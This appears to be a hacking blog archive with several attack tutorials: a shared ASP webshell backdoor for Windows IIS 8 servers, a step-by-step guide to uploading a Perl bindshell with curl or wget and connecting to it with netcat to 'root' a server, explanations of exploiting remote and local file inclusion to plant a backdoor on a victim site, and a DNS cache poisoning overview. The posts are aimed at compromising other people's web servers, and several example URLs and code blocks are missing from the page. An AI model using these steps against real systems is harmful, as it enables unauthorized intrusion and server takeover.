Articles by "Exploit"



Oke Kali ini Kita Update kembali , kali ini saya akan share ASP Shell Backdoor Shell ini beda dengan shell biasanya karena shell ini khusus hanya untuk Windows Server 2012  tepatnya pada Server IIS-8. Terkadang kita menemukan sebuah website dan ketika kita upload sebuah file ketika upload sukses namun ketika dilihat 404 Not Found dan tampilan nya merupakan 404 Not Found dari Server IIS-8 , yaps karena website yang menggunakan server IIS tidak bisa mengupload ext file sembarangan , jarang yang meng enablekan untuk ext php karena rentan dari attack , maka dari itu shell ini diperlukan karena shell ini di design khusus untuk Windows Server.

Apa sih bedanya Shell ASP sama PHP ? yok sedikit bahasan biar ga kaku :v

ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.


Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.

PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.

Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.

Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.

Kesimpulannya, baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.
mungkin cukup sekian lah asupan tentang asp nya :v

oke langsung saja berikut merupakan tampilan dari shell nya :




Source : 
https://pastebin.com/iuJhCm8Y

Semoga Bermanfaat

(Zaenal Arifin)

Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell


Material :
Bindshell script  : Here
Shell backdoor / webconsole shell : Here
netcat [if user windows] : Here 

Proof of Concept :
Step 1 :
Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command

Command Upload : 
Using Curl : curl -o bind.pl [scriptlink]
Using Wget : wget [scriptlink] -o bind.pl

Step 2 :
if u done upload the file go to cmd/Terminal [Netcat Folder]

Using Command :
Windows User : cd C:/[PathNetcat]/
Linux User : Direct order

Step 3 :
Command nc -vv [ServerIP] [Port]
if done not enter first
and go to shell backdoor/webconsole

Step 4 :
in web console u can command
Perl bind.pl 1337
and Press Enter

Notes : bind.pl => Name file bindshell , 1337 => Port

Step 5 :
Go back in cmd/Terminal
and Press Enter

and see what happens
Backconnect Success :p

PoC Video :



Notes : This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF

(Zaenal Arifin)

Remote File Inclusion (RFI)



Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on Local File Inclusion, if you haven’t please go and read  that first.



Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:






As you can see in the first line, it extracts the file parameter value from the HTTP request made by the user, while the second line utilities this value to set the file name. If the input is not being sanitized properly it can be used to include malicious file from a remote server. Here’s a vulnerable JSP code,





Again, If the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real life example. We have a URL here,





Lets break things down



  1. www.victim.com is the target website
  2. file.php is a webpage with the parameter view=
  3. For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view= , if it was including local files like view=/files/animals.php we would have test for Local File Inclusion. But as we can see its including files from docs.example.com which is a different website, it means it loads files from other website which means it may include any malicious file too. Enough theory! So here’s the vulnerable parameter 


Now I will try to load an image by submitting its URL like this





See? How easy is that? With a webshell you can take over their website or even the whole server.

Also Read : File Inclusion Attack

Local File Inclusion (LFI) and Remote File Inclusion (RFI)




Today’s article is about Local File Inclusion (LFI) and Remote File Inclusion (RFI).
If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.
We take advantage of vulnerable parameters in LFI and RFI too.

In SQL injection, we interact with the SQL database using SQL queries to retrieve sensitive data from the database. But in LFI/RFI we ask the webpage to open something for us, it could be a file or a webpage (a webpage is a file too) from another website.
Enough theory! Now lets see what the heck are LFI and RFI.

Local File Inclusion (LFI)

Take a look a this URL:






The parameter in this case is view= and the value is /images/Haxor.jpg.
It means open.php is a webpage which loads different files (Haxor.jpg in this case) from the server. There can be many sensitive files on the server which can be accessed using open.php if the webpage is vulnerable to LFI.

You can open/execute any type of file (not folders) with LFI, which means you can read logs, configuration files and execute files if a webpage is vulnerable to Local File Inclusion. You can even hack into the server if the server admin is stupid enough to not configure things properly.


Remote File Inclusion (RFI)


What is the difference between Local File Inclusion and Remote File Inclusion?
Well both vulnerabilities can be used to open things but LFI is used to open files from the server where website is hosted (locally) while RFI is used to open files from another server (remotely).
We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.

Take a look at this URL:




By looking at the above URL one would guess that the parameter page= is loading webpages.
It is opening home page, similarly it may open other pages from the website. But if the webpage (get.php) is not programmed properly then a hacker can replace home by his desired webpage like,






If everything goes well then get.php will try to open backdoor.php which will compromise the server (or something else, depends on what’s in it). It makes RFI a deadly vulnerability.

Okay a little introduction in advance, what is DNS Poisoning ?
DNS spoofing, commonly referred to as DNS Cache Poisoning, is a form of computer security hacking where corrupt Domain Name System (DNS) data is inserted into the DNS resolver cache, causing the Name Server to return an incorrect record of results, eg. IP address. This results in traffic being routed to the attacker's computer (or other computer).

Overview of the domain name system

A domain name Server System translates human-readable domain names (such as suicide-db.com) into numeric IP addresses used to route communication between nodes. Usually if the server does not know the requested translation, it will ask another server, and the process continues recursively. To improve performance, the server typically will remember (cache) this translation for a certain period of time. This means that if it receives another request for the same translation, it can reply without needing to ask another server, until the cache expires.


When the DNS server receives a fake translation and saves it for performance optimization, it is considered toxic, and it supplies false data to the client. If the DNS server is poisoned, it may return an incorrect IP address, redirecting traffic to another computer (often an attacker).

Cache poisoning attacks

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or those serviced indirectly by its downstream server(s) if applicable.

To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.


This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.

Variants

In the following variants, the entries for the server ns.suicide-db.com would be poisoned and redirected to the attacker's name server at IP address 127.0.0.1. These attacks assume that the name server for suicide-db.com is ns.suicide-db.com.

To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.

Redirect the target domain's name server

The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.


DNS server's request : what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the additional A-record (IP address) for ns.target.example, allowing the attacker to resolve queries to the entire suicide-db.com domain.

Redirect the NS record to another target domain

The second variant of DNS cache poisoning involves redirecting the nameserver of another domain unrelated to the original request to an IP address specified by the attacker.[citation needed]


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the unrelated authority information for target.example's NS-record (nameserver entry), allowing the attacker to resolve queries to the entire suicide-db.comdomain.

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget